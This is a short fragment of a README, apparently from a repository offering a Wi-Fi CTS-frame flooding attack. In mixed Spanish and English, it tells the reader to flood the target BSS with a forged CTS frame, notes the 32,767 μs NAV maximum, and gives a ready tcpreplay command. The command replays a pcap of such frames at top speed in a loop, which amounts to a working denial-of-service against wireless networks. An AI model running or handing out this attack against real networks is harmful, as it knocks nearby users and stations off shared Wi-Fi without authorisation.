Fz3r0/Fz3r0_-_Wi-Fi_CTS-Frame-Attack-802.11-Frame/README.md

 Solo es necesario inyectarlo a la red en forma de flood al BSS que quieras atacar, por ejemplo:

+- **The maximum amount of microseconds that can be set on the NAV timers of listening stations that hear the transmission of another 802.11 station is = `32,767 μs`**

 ```sh
 tcpreplay --intf1=wlan0mon --topspeed --loop=2000 Fz3r0_CTS_808_30000duration_attack.pcap 2>/dev/null
 ```